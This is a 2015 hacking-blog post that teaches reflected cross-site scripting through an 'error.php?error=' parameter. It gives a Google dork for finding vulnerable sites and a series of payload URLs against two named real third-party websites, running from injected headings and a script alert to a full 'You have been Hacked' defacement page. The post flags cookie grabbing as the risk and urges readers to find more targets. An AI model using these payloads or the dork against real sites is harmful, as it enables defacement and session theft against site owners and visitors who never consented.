Announcement: This Website is For sale, if you're intrested, Please contact US

Monday, 28 September 2015

error.php XSS (cross Site Scripting) Vulnerabilities

Posted by   on

error.php XSS (cross Site Scripting) Vulnerabilities

Title : error.php XSS
Risk : Cross site scripting, cookie Grabbing
Poc : error.php?error=
Dork : "inurl:error.php?error="
Author : Minhal Mehdi
browser : Mozilla Firefox 

Lets Start Goto Google, and say hello To Google ! 
now type the dork "inurl:error.php?error="
in search results ignore all the extra results with diffrent url Like : error-php-error.php
pick site with url www.site.com/error.php?error= Only
Now Type your first Tag to Check the vulnerablity 
example : www.site.com/error.php?error=<h1>Test</h1>
if it will show you "Test" word in Header tag this Its Vulnerable
I got This website from Search results, so now see some examples :
To show Header
http://www.sacareerfocus.co.za/error.php?error=<h1>Hacked</h1>
To show header in center
http://www.sacareerfocus.co.za/error.php?error=<center><h1>Hacked</h1></center>
to show Title
http://www.sacareerfocus.co.za/error.php?error=<title>Hacked</title>
to Add a Image
http://www.sacareerfocus.co.za/error.php?error=<img src="http://3.bp.blogspot.com/-EtkPBc32dF0/UIgFEjw-cuI/AAAAAAAABGM/eIdp8Qg0hUg/s640/cats.jpg"/>
to add a Message 
http://www.sacareerfocus.co.za/error.php?error=<p><b>Your Message Here<b></p>
to write message in next lines
http://www.sacareerfocus.co.za/error.php?error=<p><b>First line<br>Second Line <b></p> 
To add a scrolling Text
http://www.sacareerfocus.co.za/error.php?error=<marquee>Scrolling text Here</marquee>
To Add a alert box 
http://www.sacareerfocus.co.za/error.php?error=<script>alert("hello");</script>
To add background colour in page
http://www.sacareerfocus.co.za/error.php?error=<body bgcolor="red"/>
to Add a full deface Page 
http://www.sacareerfocus.co.za/error.php?error=<title>Hacked</title><center><h1>hacked<h1><body bgcolor="red"/><p><b>You have been Hacked<br></b></p><img src="http://t0.gstatic.com/images?q=tbn:ANd9GcTN4uz2ifRTDefV_N7O2ZLEnyNfWb5TooIwqmZSwxOe_XH-8FksHA"/>
<marquee><b>www.devilscafe.in</b></marquee>

you can add more html and javscript tags here,
here is another demo site : 
http://europeanvaluepartneradvisors.com/error.php?error=<center><h1>www.devilscafe.in</h1></center>
find More website with dorks :)
please Leave a comment and share post to show your love For devilscafe !
 

 


5 comments:
Write comments
  1. This comment has been removed by a blog administrator.

    ReplyDelete
  2. This comment has been removed by a blog administrator.

    ReplyDelete
  3. This comment has been removed by a blog administrator.

    ReplyDelete
  4. This comment has been removed by a blog administrator.

    ReplyDelete
  5. This comment has been removed by a blog administrator.

    ReplyDelete

Get Updates about Latest Hacks, Exploits, Applications and Softwares. http://www.devilscafe.in/
Join Our Newsletter